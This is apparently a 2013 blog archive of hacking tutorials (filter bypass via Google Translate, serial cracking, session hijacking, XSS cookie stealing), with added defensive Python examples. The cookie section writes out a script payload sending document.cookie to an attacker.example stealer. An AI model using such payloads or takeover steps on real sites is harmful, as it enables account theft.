Sunday, 15 September 2013

Hide your shadow and bypass the security: Part 2

Hey Friends,
Today I am going to show you a method by which you can access websites blocked by your network administrator.

Before you go through this tutorial, you may also want to read the first part of this security-bypass series:

Here is the link : http://oxhat.blogspot.in/2012/10/hide-your-shadow-and-bypass-security.html

The advantage of this technique is that pages load faster than through Tor or other proxy software. It also bypasses filters that block gstatic.com.

gstatic.com is not a separate company: it is a Google-owned domain that serves static content (scripts, stylesheets, images) for Google services. Network filters sometimes block it as part of blocking Google's tracking and advertising infrastructure, and blocking it breaks many Google pages in the process.

Step 1. Go to translate.google.com. 


Step 2. Paste the URL of the blocked site into the text box and select translation from English to Chinese (or any other language, but not English!).




Step 3. Now click the Translate button. Google fetches the page on your behalf and returns a translated copy served from its own servers, so the filter only sees traffic to Google.





Step 4. Now click the Show original button on the right side and you get the desired page back in English.




Sometimes you need to click Show original as soon as the page has partially loaded, so that no further requests go out. Be aware that embedded resources (images, scripts) may still be fetched directly from the original site, so a filter that logs every request can still notice those.
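The same trick seen from the network administrator's side, as an added example that is not part of the original post: a small Python script that flags proxy-log entries where translate.google.com is fetching a blocked site on a user's behalf. It assumes the translate page passes the target page in the u= query parameter (which is what the steps above produce) and a simple "client_ip url" log format; the format, hostnames and log lines are constructed for the demo.

```python
"""Detect translate.google.com being used as a web proxy in outbound proxy logs.

Added example, not part of the original post. The URL layout assumed here
(the target page carried in the `u=` query parameter) is what the GUI steps
above produce; adjust TRANSLATE_HOSTS to the Google domains your users reach.
Log lines are constructed: "client_ip url".
"""
from urllib.parse import urlparse, parse_qs

TRANSLATE_HOSTS = {"translate.google.com", "translate.google.co.in"}  # assumption: add local TLDs


def translated_target(url: str):
    """Return the hostname the translate proxy is fetching for the user, or None if not a proxy request."""
    parsed = urlparse(url)
    if parsed.hostname not in TRANSLATE_HOSTS:
        return None
    target = parse_qs(parsed.query).get("u", [None])[0]
    if not target:
        return None
    return urlparse(target).hostname


def flag_bypass(log_lines, blocklist):
    """Return (client, blocked_host, url) for requests that reach a blocked site through the translate proxy."""
    hits = []
    for line in log_lines:
        client, _, url = line.strip().partition(" ")
        host = translated_target(url)
        if host and any(host == b or host.endswith("." + b) for b in blocklist):
            hits.append((client, host, url))
    return hits


# Constructed sample log: one bypass, one legitimate translation, one static asset, one direct (already blocked) hit.
SAMPLE_LOG = [
    "10.0.0.5 https://translate.google.com/translate?sl=en&tl=zh-CN&u=http://www.blocked.example/news",
    "10.0.0.5 https://translate.google.com/translate?sl=en&tl=fr&u=http://allowed.example/",
    "10.0.0.7 https://www.gstatic.com/translate/some.css",
    "10.0.0.9 http://www.blocked.example/direct",
]
BLOCKLIST = ["blocked.example"]

if __name__ == "__main__":
    for client, host, url in flag_bypass(SAMPLE_LOG, BLOCKLIST):
        print(f"{client} reached {host} through the translate proxy: {url}")
```

The direct request on the last line is what the existing filter already catches; the point of the check is the first line, where the only hostname the filter sees is Google's.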

                                                                           Thanks

Thursday, 4 July 2013

Hacking C codes. The Dark Art of Reverse Engineering Part 1: Decompile


You may have used cracks, keygens or patches at some point in your life. Have you ever wondered how they are developed? In this tutorial I am going to demonstrate the "dark art of reverse engineering".

Before I begin I must say that reverse engineering is a tough, tedious job that requires a huge amount of time. To learn it one must show enough dedication and patience. The tutorial that follows took a lot of time to disassemble, decompile and interpret.

Okay, so let's begin.

Caution:
This tutorial should be used for educational purposes only. I won't be responsible if you misuse these techniques and get yourself in trouble. Reverse engineering software without the owner's permission can be illegal.
The software I will be hacking as part of the demo was developed by me.

Tools Required
  • Any Linux Distro
  • Any C executable file
  • RecStudio
Prerequisites 
  • Knowledge of C programming
  • Knowledge of ASM (not required for this tutorial, but helpful from Part II onward)
So the scenario goes like this.

A game developer, Mr Coder, has developed a game. To make sure there is no software piracy he decides to ask for the serial key every time someone starts the game. This is the piece of code he wrote:



To make sure his code works, Mr Coder runs it and checks the output:




Now he is pleased that no one can have a pirated copy. So Mr Coder starts selling the hello.o file along with the serial, and keeps his source code to himself so that no one can read it.


Somehow a cracker, Mr Cracker, got hold of the hello.o file, but he neither has the serial nor is willing to buy the game. So what to do? Mr Cracker decides to hack the game instead.


So he fires up RecStudio and opens the hello.o file with it. Here is how hello.o looks after it is loaded in RecStudio:



This is the assembly listing RecStudio produced by disassembling the hello.o executable.


Now he goes through the various segments in the Project tab to find the equivalent decompiled code.

Mr Cracker goes on checking each piece of decompiled code. When he reaches the main function he finds something interesting ;)





Looking at the highlighted code, the error message "Not a valid serial.." is displayed when the values of _v8 and _v12 do not match. Just above, _v8 is assigned the constant 1234, which is then compared with the other variable, and the error is printed when they differ. So 1234 could well be the serial.


So he enters 1234 when asked for the serial and gets access to the game. Congrats!


In the next tutorial I will explain how the same result can be obtained from the assembly listing alone, and in later tutorials how to make the crack for this game.
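To show why the decompiled view gives the serial away, here is an added Python example (not from the post and not RecStudio's output) that works on the raw bytes of such a binary: at -O0, gcc stores the constant with mov DWORD PTR [rbp-8], 1234 and later compares that stack slot, and both instruction forms have fixed encodings that can be pattern-matched. The byte snippet below is constructed to look like that main(); the scanner is a heuristic, so on a real hello.o (read with open(path, 'rb').read()) data bytes that happen to match will produce extra candidates.

```python
"""Recover candidate serial constants from the bytes of an x86/x86-64 binary.

Added example, not part of the original post. It matches the -O0 encodings
gcc emits for stack-slot operations against [ebp/rbp+disp8]:
    C7 45 disp8 imm32   mov DWORD [bp+disp8], imm32   (ModRM 0x45: mod=01, /0, rm=101)
    81 7D disp8 imm32   cmp DWORD [bp+disp8], imm32   (ModRM 0x7D: mod=01, /7, rm=101)
    83 7D disp8 imm8    cmp DWORD [bp+disp8], imm8 (sign-extended)
    39/3B modrm disp8   cmp [bp+disp8], r32 / cmp r32, [bp+disp8]
Encodings are identical on x86-64 for 32-bit operands, so no REX handling is needed.
The sample bytes are constructed; the heuristic can misfire on data that looks like code.
"""
import struct


def _s8(buf, off):
    return struct.unpack_from("<b", buf, off)[0]


def _s32(buf, off):
    return struct.unpack_from("<i", buf, off)[0]


def stack_immediates(code: bytes):
    """Decode mov/cmp instructions that touch [bp+disp8].

    Returns (offset, kind, disp8, imm) tuples; imm is None for register compares.
    """
    found = []
    i, n = 0, len(code)
    while i + 1 < n:
        op, modrm = code[i], code[i + 1]
        if op == 0xC7 and modrm == 0x45 and i + 7 <= n:           # mov [bp+disp8], imm32
            found.append((i, "mov", _s8(code, i + 2), _s32(code, i + 3)))
            i += 7
        elif op == 0x81 and modrm == 0x7D and i + 7 <= n:         # cmp [bp+disp8], imm32
            found.append((i, "cmp", _s8(code, i + 2), _s32(code, i + 3)))
            i += 7
        elif op == 0x83 and modrm == 0x7D and i + 4 <= n:         # cmp [bp+disp8], imm8
            found.append((i, "cmp", _s8(code, i + 2), _s8(code, i + 3)))
            i += 4
        elif op in (0x39, 0x3B) and (modrm & 0xC7) == 0x45 and i + 3 <= n:  # cmp with a register
            found.append((i, "cmp", _s8(code, i + 2), None))
            i += 3
        else:
            i += 1
    return found


def candidate_serials(code: bytes):
    """Constants that are compared directly, plus constants stored into a slot that is later compared."""
    stored, compared, candidates = {}, set(), set()
    for _off, kind, disp, imm in stack_immediates(code):
        if kind == "mov":
            stored[disp] = imm
        else:
            compared.add(disp)
            if imm is not None:
                candidates.add(imm)
    candidates.update(imm for disp, imm in stored.items() if disp in compared)
    return sorted(candidates)


# Constructed snippet mimicking the check in main() at -O0:
#   mov DWORD [rbp-8], 1234      C7 45 F8 D2 04 00 00   (the serial, _v8 in the decompiler)
#   mov DWORD [rbp-4], 0         C7 45 FC 00 00 00 00   (unrelated local, never compared)
#   mov eax, DWORD [rbp-12]      8B 45 F4               (user input, _v12)
#   cmp DWORD [rbp-8], eax       39 45 F8
#   jne .Lfail                   75 0E
SAMPLE_CODE = bytes.fromhex("C745F8D2040000" "C745FC00000000" "8B45F4" "3945F8" "750E")

if __name__ == "__main__":
    for off, kind, disp, imm in stack_immediates(SAMPLE_CODE):
        print(f"+{off:#06x}: {kind} [bp{disp:+d}] imm={imm}")
    print("candidate serials:", candidate_serials(SAMPLE_CODE))
```

The unrelated local at [rbp-4] is deliberately filtered out: only constants that flow into a compare are reported, which is the same reasoning Mr Cracker applied by eye to _v8 and _v12.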

                                                    Thank You

Tuesday, 25 June 2013

Tracking Down the Culprit PandoraService.exe


Sometimes when you monitor your network usage you come across something weird and ask yourself, "How the hell did such bandwidth consumption occur?"

Yes, it happens. Today I am going to show you how to investigate such a problem and find a solution.



Here is a simple scenario that I am going to explain and demonstrate. This is not so much a tutorial as a method for finding out more about services that consume a lot of bandwidth. If you read this, you should be able to take down similar culprits the same way. So here we go.




I was playing around with Wireshark for a while, analysing the packets on my network, when I noticed something weird in the traffic: lots of TCP SYN packets were being sent from my local IP to a remote IP, 111.111.111.111.







I checked the inbound and outbound connections and found more traffic directed to port 80 of 111.111.111.111. An "innocent" little program, PandoraService.exe, was responsible for it.
I had seen this process for some time, but I never understood its origin or its purpose.
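The observation above, as an added script rather than eyeballing Wireshark (this is not part of the original post): it reads packet records in the shape of a tshark field export and reports flows where a host keeps sending SYNs that are never answered with a SYN-ACK. The capture, the thresholds and every address other than 111.111.111.111 are constructed for the demo.

```python
"""Find SYN bursts that never complete a handshake, the symptom described above.

Added example; not part of the original post. Records are constructed in the
shape `tshark -T fields -e frame.time_relative -e ip.src -e ip.dst
-e tcp.dstport -e tcp.flags` would give. Thresholds are assumptions to tune.
"""
from collections import defaultdict

SYN, ACK = 0x002, 0x010

# Constructed capture: 192.168.1.10 retries SYN to 111.111.111.111:80 once a second and
# never gets a SYN-ACK back, while a normal handshake to 203.0.113.5:443 completes.
CAPTURE = """\
0.00 192.168.1.10 111.111.111.111 80 0x002
1.00 192.168.1.10 203.0.113.5 443 0x002
1.05 203.0.113.5 192.168.1.10 51000 0x012
1.06 192.168.1.10 203.0.113.5 443 0x010
1.00 192.168.1.10 111.111.111.111 80 0x002
2.00 192.168.1.10 111.111.111.111 80 0x002
3.00 192.168.1.10 111.111.111.111 80 0x002
4.00 192.168.1.10 111.111.111.111 80 0x002
5.00 192.168.1.10 111.111.111.111 80 0x002
6.00 192.168.1.10 111.111.111.111 80 0x002
7.00 192.168.1.10 111.111.111.111 80 0x002
"""


def parse_capture(text):
    """Turn the field export into (time, src, dst, dport, flags) tuples."""
    records = []
    for line in text.strip().splitlines():
        t, src, dst, dport, flags = line.split()
        records.append((float(t), src, dst, int(dport), int(flags, 16)))
    return records


def syn_bursts(records, min_syns=5, window=10.0):
    """Return {(src, dst, dport): count} for client flows that sent >= min_syns bare SYNs
    inside `window` seconds and never received a SYN-ACK from that server."""
    syn_times = defaultdict(list)
    answered = set()                       # (client, server) pairs that saw a SYN-ACK
    for t, src, dst, dport, flags in records:
        if flags & SYN and not flags & ACK:
            syn_times[(src, dst, dport)].append(t)
        elif flags & SYN and flags & ACK:
            answered.add((dst, src))       # a SYN-ACK travels server -> client
    bursts = {}
    for (src, dst, dport), times in syn_times.items():
        if (src, dst) in answered:
            continue
        times.sort()
        best = j = 0
        for i, t in enumerate(times):      # densest `window`-second span
            while t - times[j] > window:
                j += 1
            best = max(best, i - j + 1)
        if best >= min_syns:
            bursts[(src, dst, dport)] = best
    return bursts


if __name__ == "__main__":
    for (src, dst, dport), count in syn_bursts(parse_capture(CAPTURE)).items():
        print(f"{src} sent {count} unanswered SYNs to {dst}:{dport}")
```

Once a flow is flagged, netstat -ano on Windows (or ss -tp on Linux) maps the remote address to the owning process ID, which is the step that surfaces a name like PandoraService.exe.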

So I browsed http://whois.domaintools.com/ to find more about this IP.

The IP appeared to be from Japan: the whois record came from the Japan Network Information Center (the registry for Japanese address space, not necessarily the operator of the server). But I was still not convinced by this result.




I wanted to dig a bit deeper, so I asked my 'old friend' Google about this IP.

Here is an interesting post from the Avast forum that drew my attention. It stated:


"The address for this service, Process: pandoraservice.exe, not related to Pandora av but actually a hidden service that was installed by the open source video viewer, KMPlayer, was blocked by MBAM just because it was related to Zeus. Probably the host has finally removed it, so MBAM is considering to remove the IP block."




Believe it or not, my KMPlayer was indeed running!


I checked the processes in Task Manager and found the devil: PandoraService.exe! :D

On killing the process, the traffic to 111.111.111.111 simply stopped. Note that this only stops the traffic until the service is started again (for instance at the next reboot), so the next step is to find its autostart entry and check the file's publisher and hash before deciding whether it is a bundled updater or something malicious.

Wednesday, 29 May 2013

Google Dorks (Google Hacking) Part I




Google dorks are search queries built from Google's advanced operators; they are the quickest way to pull targeted results out of Google.

Google hacking is the technique of using Google Search to find security holes in the configuration of, and vulnerabilities in, websites, web servers, security cameras, etc.


 CAUTION
"This tutorial should be used for educational purposes only. I won't be responsible if you misuse these techniques and get yourself in trouble."

In this tutorial I am going to cover the basics of Google dorks.

The Google dorks tutorial is divided into multiple parts. In this first part we get acquainted with the basics of dorking and the "harmless" uses of dorks. So enjoy the tutorial.





Here are a few examples of Google dorks:


  • inurl:java                  pages whose URL contains "java"
  • dns site:example.com        restricts the results for "dns" to pages in the given domain
  • php filetype:pdf            downloadable PDF files that match "php"
  • allintext:google            pages whose body text contains "google" (allintext matches the page text only, not the URL)
  • php ext:ppt                 same as filetype: downloadable PowerPoint files that match "php"
  • link:example.com            pages that link to example.com (this operator has since been deprecated by Google)


You can also combine them to get more targeted results, for example site:example.com filetype:pdf to list the PDF files indexed under a single domain.


Wednesday, 27 February 2013

Session Hijacking and Fixation


Session hijacking is taking over another user's session by obtaining the session identifier the server issued to that user. Session fixation is the related attack in which the attacker first plants a session identifier he already knows in the victim's browser; if the application authenticates the user without invalidating that existing identifier, the attacker can then use it as an authenticated session.

Either attack gives a malicious user full access as the authenticated user.

Web applications use cookies to store temporary data on the client. Often one of these cookies holds the session ID of a logged-in user, which lets the server identify that user on every request until he logs out and the session is destroyed.


The attack can be represented as follows:




For this demonstration I am using 

  • Firefox Browser ( Attacker )
  • Comodo IceDragon Browser ( Victim )
  • Tamper data ( Firefox Addon )
  • Cookie stealing methods; if you don't know them, read my previous post (Web Application Hacking: Cookie Stealing)
                                                                             CAUTION
"This tutorial should be used for educational purposes only. I won't be responsible if you misuse these techniques and get yourself in trouble. Performing such attacks without the permission of the owner can lead to serious trouble."



Let the attacker first log in using his own credentials.

This is the information displayed about the attacker after logging in:



Now the attacker goes to a forum and injects the malicious script:





What happens at this point is that the injected script redirects the visitor's browser to a cookie-stealer script. This cookie catcher stores the cookie values in a log file, from which the cookie information is later extracted. After injecting the code the attacker waits for the victim to log in and open the forum.

Now the victim logs in.

This is the information displayed about the victim after logging in:



Once the victim opens the forum page, the script reads the cookies, redirects the browser to the cookie catcher page, and the cookie information is logged to the log file:



Now the attacker copies this session ID and, using Tamper Data, replaces his own session ID with the hijacked one:



Now if the attacker checks the account information, the information of the user whose session was hijacked is displayed. That means the attacker is inside another user's account as an authenticated user. Note that the steps above are session hijacking (the attacker steals an existing identifier); session fixation would instead plant a known identifier before the victim logs in. Regenerating the session ID on login (session_regenerate_id() in PHP) defeats fixation, and marking the session cookie HttpOnly keeps an injected script from reading it in the first place.
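To make the difference between the two attacks concrete, here is an added Python model (not part of the original post and not the demo application's code) of a toy server that either keeps or regenerates the session ID at login, with a fixation attempt and a hijack attempt run against each. The class and function names, the session ID format and the user names are assumptions for the demo.

```python
"""Session fixation and hijacking against a toy server, vulnerable and fixed side by side.

Added example; not part of the original post. The server keeps sessions in a
dict keyed by session ID; a "browser" here is just the ID string it presents.
"""
import secrets


class Server:
    def __init__(self, regenerate_on_login):
        self.sessions = {}                 # sid -> {"user": name or None}
        self.regenerate_on_login = regenerate_on_login

    def _new_sid(self):
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": None}
        return sid

    def visit(self, sid=None):
        """GET /: keep a presented session cookie if the server knows it, else issue a fresh one."""
        if sid not in self.sessions:
            sid = self._new_sid()
        return sid

    def login(self, sid, user):
        """POST /login: authenticate the user behind `sid`; returns the cookie the browser holds afterwards."""
        if sid not in self.sessions:
            sid = self._new_sid()
        if self.regenerate_on_login:
            # Fixed server: discard the pre-login ID so an ID the attacker planted or already knows is useless.
            del self.sessions[sid]
            sid = self._new_sid()
        self.sessions[sid]["user"] = user
        return sid

    def whoami(self, sid):
        """GET /profile: which user does the server associate with this cookie?"""
        return self.sessions.get(sid, {}).get("user")


def fixation_attack(server):
    """Attacker gets an anonymous ID, plants it in the victim's browser (link or XSS), victim logs in."""
    planted = server.visit()                    # attacker's pre-login session ID
    victim_sid = server.visit(planted)          # victim's browser now presents the planted ID
    server.login(victim_sid, "victim")          # victim authenticates on top of it
    return server.whoami(planted)               # attacker reuses the ID he already knows


def hijack_attack(server):
    """Attacker steals the victim's post-login cookie (the XSS + cookie catcher above) and presents it."""
    stolen = server.login(server.visit(), "victim")   # what the cookie-catcher log would contain
    attacker_sid = server.login(server.visit(), "attacker")
    # The Tamper Data step: the attacker swaps his own cookie for the stolen one.
    return server.whoami(stolen), server.whoami(attacker_sid)


if __name__ == "__main__":
    for regen in (False, True):
        srv = Server(regenerate_on_login=regen)
        print(f"regenerate_on_login={regen}: fixation -> {fixation_attack(srv)!r}, "
              f"hijack -> {hijack_attack(srv)!r}")
```

Regeneration stops the fixation case but not the hijack: a cookie stolen after login is valid until it expires or the victim logs out, which is why the cookie has to be kept out of the injected script's reach (HttpOnly) and the injection itself removed by encoding user content on output.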



Thank You




Tuesday, 15 January 2013

Web Application Hacking : Cookie Stealing


Cookies are small pieces of data (at most about 4 KB each) stored in the client's browser. They are usually generated on the server by server-side code, sent to the browser in the response, and stored there; the browser sends them back with each later request. They carry information such as the time of access, username, session information, etc. for the client logged into a particular website.

In this tutorial I am going to show how cookies are stolen and logged to a separate file.


                                                                      CAUTION
"This tutorial should be used for educational purposes only. I won't be responsible if you misuse these techniques and get yourself in trouble. Performing such attacks without the permission of the owner can lead to serious trouble."


Here is the HTML code of the login form of a sample application:



Now I need a server-side script that sets cookies holding the username and password of the logged-in user in the browser. (Storing a password in a cookie is itself bad practice; it is done here only to make the theft visible.)


The above piece of code is written in PHP and does two things:

  • It sets the cookies
  • It includes a file containing the users' comments
Now I need one more thing, i.e. a cookie-stealing script.
Download here: https://github.com/dibsy/codesec/blob/master/cookieStealer.php

Now I place the cookie-stealing script and the log file on a remote server (or upload them to a hosting site).

Now suppose there is a forum which allows users to post comments, something like this:
I am going to inject some code here: a script that sends the browser's cookies to the cookie-stealing script, in this way:



Now my script is ready to accept and log the cookies of any client who opens the comment section.

Now suppose someone logs into his/her account:

username=admin
password=password


And now if I check the log file where the cookies are stored, I find the cookies logged:
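An added Python model of the pieces above (not the post's PHP code): the cookies the login script sets, the comment the attacker posts, and what an injected script can actually read. It shows the two fixes side by side, HTML-encoding the comment on output and setting HttpOnly on the cookie. The catcher URL, the PHPSESSID cookie and the comment text are constructed for the demo.

```python
"""How the injected comment reaches the cookie log, and the two fixes that stop it.

Added example; not the post's PHP code. The catcher URL, the PHPSESSID cookie
and the comment text are constructed for the demo. document.cookie in a real
browser never includes HttpOnly cookies, which script_visible() models.
"""
import html
from http.cookies import SimpleCookie

CATCHER = "http://attacker.example/cookieStealer.php"   # constructed: where the stealer is hosted


def issue_cookies(values, httponly):
    """The Set-Cookie headers the login script sends. PHP's setcookie() adds HttpOnly only if asked."""
    jar = SimpleCookie()
    for name, value in values.items():
        jar[name] = value
        jar[name]["path"] = "/"
        jar[name]["httponly"] = httponly
    return jar


def script_visible(jar):
    """What document.cookie returns in the browser: every cookie except the HttpOnly ones."""
    return "; ".join(f"{m.key}={m.value}" for m in jar.values() if not m["httponly"])


def stealer_payload(catcher):
    """The comment the attacker posts: send the browser, cookies and all, to the catcher."""
    return f"<script>document.location='{catcher}?c='+document.cookie</script>"


def render_comment(comment, escape_output):
    """The vulnerable forum echoes the comment as HTML; the fixed one HTML-encodes it first."""
    body = html.escape(comment, quote=True) if escape_output else comment
    return f'<div class="comment">{body}</div>'


def exfiltrated(jar, comment, escape_output):
    """Simulate the victim's visit: a surviving <script> tag sends the script-visible cookies.

    Stand-in for the browser's HTML parser: an encoded &lt;script&gt; is just text.
    Returns the URL the catcher would log, or None if nothing executes.
    """
    page = render_comment(comment, escape_output)
    if "<script>" not in page:
        return None
    return f"{CATCHER}?c={script_visible(jar)}"


# The credentials from the post; the PHPSESSID value is constructed.
LOGIN_COOKIES = {"username": "admin", "password": "password", "PHPSESSID": "abc123"}

if __name__ == "__main__":
    weak = issue_cookies(LOGIN_COOKIES, httponly=False)
    hard = issue_cookies(LOGIN_COOKIES, httponly=True)
    print(hard.output())                                   # each header now carries HttpOnly
    payload = stealer_payload(CATCHER)
    print("raw echo, no HttpOnly :", exfiltrated(weak, payload, escape_output=False))
    print("raw echo, HttpOnly    :", exfiltrated(hard, payload, escape_output=False))
    print("escaped output        :", exfiltrated(weak, payload, escape_output=True))
```

HttpOnly only protects the cookie values; the script still runs in the victim's browser, so encoding the comment on output (which removes the injection itself) is the fix that matters, with HttpOnly as the second layer.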



------------------------------------ Thanks for reading----------------------------------